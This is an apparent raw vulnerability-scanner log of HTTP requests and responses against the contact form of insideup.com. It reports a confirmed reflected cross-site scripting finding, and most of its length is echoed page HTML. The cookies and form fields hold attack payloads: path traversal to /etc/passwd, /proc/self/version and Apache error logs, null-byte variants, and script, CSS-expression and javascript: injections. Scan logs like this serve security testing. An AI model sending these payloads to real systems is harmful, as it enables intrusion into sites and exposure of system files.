Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 261
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=3&company=3&email=netsparker%40example.com&firstName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000BE2)%3c%2fscript%3e&lastName=Smith&leadCategory=3&phone=3&subCategoryId=-1&url=3&value=3&yourInterest=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:35:17 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=B8484958ECDCCE6F8812954C60AB1EB3; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, contact, email"/> <meta name="description" content="Getting in touch with the InsideUp team"/> <meta name="robots" content="index; follow"/> <title>Contact us and send your feedback.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('ContactUs',0,'')" alt="Contact Us" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerContactusActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script>
var RecaptchaOptions = {
theme :'custom',
lang :'en',
custom_theme_widget :'recaptcha_widget'
};
</script><div style="background:#eeeeee;"> <table width="902" border="0" align="center" cellpadding="0" cellspacing="0" style="background:url(images/ContectBgImg.png) repeat-y top;"> <tr> <td width="596"> <form method="post" action="contactUs.html"> <input type="hidden" id="value" name="value" value="3" /> <input type="hidden" id="subCategoryId" name="subCategoryId" value="-1" /> <table width="568" border="0" align="right" cellpadding="0" cellspacing="0">
<tr> <td height="84" colspan="2" style="font:bold 24px Arial, Helvetica, sans-serif; color:#2564c7;">Contact Us</td> </tr> <tr> <td colspan="2" style="border-top:1px solid #eaeaea; border-bottom:1px solid #eaeaea;"> <table width="539" border="0" align="left" cellspacing="0" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121; margin:10px 0 15px 0;"> <tr> <td width="257" height="40" align="right">First Name&nbsp;&nbsp; <input type="text" value="'"--></style></script><script>netsparker(0x000BE2)</script>" name="firstName" id="firstName" style="width:160px; border:1px groove #c3c3c3;" class=" formError" /> </td> <td width="278" align="right">Last Name&nbsp;&nbsp; <input type="text" value="Smith" name="lastName" id="lastName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> </tr> <tr> <td height="40" align="right">Email&nbsp;&nbsp; <input type="text" value="netsparker@example.com" name="email" id="email" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td align="right">Phone&nbsp;&nbsp; <input type="text" value="3" name="phone" id="phone" style="width:160px; border:1px groove #c3c3c3;" class="formError" /> </td> </tr> <tr> <td height="40" align="right">Company&nbsp;&nbsp; <input type="text" value="3" name="company" id="company" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> <td align="right"> Your Interest&nbsp;&nbsp; <select value="3" name="yourInterest" id="yourInterest" style="width:160px; border:1px groove #c3c3c3;"> <option>Media Relations</option> <option>Buy Leads</option> <option>Customer Service</option> <option>Investor Relations</option> <option>Partner</option> </select> </td> </tr> <tr> <td align="right">Lead Category&nbsp;&nbsp; <select name="leadCategory" id="leadCategory" class='' style="width:160px;"> <option selected="selected" value="3"></option> </select> </td> <td height="40" align="right">Company URL&nbsp;&nbsp; <input type="text" value="3" name="url" id="url" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> </tr> </table> </td> </tr> <tr> <td width="95" height="115" align="right" valign="top" style="padding:25px 0 0 0; font:normal 12px Arial, Helvetica, sans-serif; padding-right:2px;">Comments&nbsp;&nbsp; </td> <t..
- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter Type Value
button POST Submit
captchaString POST 3
comments POST 3
company POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST '"--></style></script><script>alert(0x000BF9)</script>
leadCategory POST 3
phone POST 3
subCategoryId POST -1
url POST 3
value POST 3
yourInterest POST 3

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 261
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=3&company=3&email=netsparker%40example.com&firstName=Smith&lastName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000BF9)%3c%2fscript%3e&leadCategory=3&phone=3&subCategoryId=-1&url=3&value=3&yourInterest=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:35:24 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=35A6491C8ABBD42766BE4CA45EF42401; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, contact, email"/> <meta name="description" content="Getting in touch with the InsideUp team"/> <meta name="robots" content="index; follow"/> <title>Contact us and send your feedback.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" 